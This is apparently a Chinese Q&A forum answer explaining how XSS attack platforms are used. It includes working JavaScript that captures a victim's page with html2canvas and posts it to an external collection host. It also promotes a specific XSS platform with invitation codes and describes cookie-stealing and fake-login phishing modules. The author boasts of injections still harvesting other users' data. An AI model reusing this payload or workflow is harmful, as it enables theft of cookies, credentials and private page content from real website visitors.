xss平台的作用是什麼?
很多種的xss平台,比如xssnow之類的。裡面有很多模塊,這些模塊怎麼用?
通過注入XSS代碼獲取你能在他瀏覽器窗口中甚至設備里能獲取的信息
比如本地存儲的LocalStorage Cookie webSQL等
再比如獲取頁面截圖,如果被攻擊是在訪問一些限定許可權瀏覽的頁面,那麼你也可以一起看。
配置一個截圖功能的 XSS 項目你只需要先引入 JQ、html2canvas 模塊,然後在項目代碼中寫如下代碼就可以了。當然這裡只是為了演示,你可以不依賴任何開源模塊自己實現截圖以及發送功能。
;(function(global,$) {
html2canvas(global.document.body)
.then(canvas =&> {
let base64 = canvas.toDataURL("image/jpeg")
return $.ajax("http://xss.bood.in/api/screenshot" , {
method: "POST",
data: {
file: base64,
id: "{__projectId}"
}
})
})
.then(res =&> {
console.log("success")
})
})(this, $)
換域名了Login - Cov XSS
現在還在完善中,先放幾個邀請碼體驗一下吧
未使用剛剛c05fc2977d59e4666ccb5604e1b9edf6未使用剛剛
3b995a22e1232f10659f6592942b6405未使用剛剛bab276f70a22337a076640f703362588未使用7秒前70e75e00eaf9b1a2834ce7868215baf5未使用11秒前a1ac7748ee9cee1f0ec3a886c6e72650
未使用11秒前d3aa07b7c4edd41955c81032125aef4b未使用11秒前d9ad3604e961489d54b024fe68ee4202未使用1分鐘前39d34bc2f911f7ca90a5bb29b39bc63f未使用
1分鐘前e28d6dde82a7faa05b38b745e5b57fd9已使用1月前027d4c8654cf588a77850326dd9a9cd8已使用1月前09a4327fdc276afc4854617f2010be15未使用1月前
用於收取cookie,賬號等信息。
直接創建項目。在網站有xss的地方插入項目中的代碼,執行的時候會把對應的信息發送到平台上。具體看平台上的說明。默認模塊:
用戶獲取用戶的cookie等信息。
插入xss後,其他用戶訪問的時候幾乎沒有感覺。但是cookie,訪問的目標等信息都會被發送到平台上。(上圖是很久前插的,今天去看發現還有很多新的)基礎認證釣魚模塊:
插入xss後,用戶訪問的時候會彈出一個登陸框,用於輸入用戶名和密碼。如果用戶粗心地輸入了自己的賬號和密碼,那麼就可以在平台上看到輸入的信息。(上圖是很久前的,現在已經沒有了)還有的平台上有自定義js的功能,可以自定義執行的js內容(如可以考慮和csrf一起利用,進行自動轉載點贊等)。
一句話概括:操縱用戶客戶端執行任意js腳本.腳本能實現什麼功能,xss就可以怎樣
推薦閱讀:
※最近「佛系」火了,除了90後,大家還發現了哪些具有佛性的事物?
※QQ空間自動轉發廣告怎麼解決?(你們要的轉髮網址來了!)
※怎樣看待NodeJS模塊node-serialize存在的反序列化漏洞?
※用偽中文版 putty 登陸過伺服器後應該怎麼辦?
※如何評價「最大的安全公司之一 Norse Corp 瀕臨倒閉」?
TAG:網路安全 | XSS | 滲透測試 | 白帽黑客WhiteHat |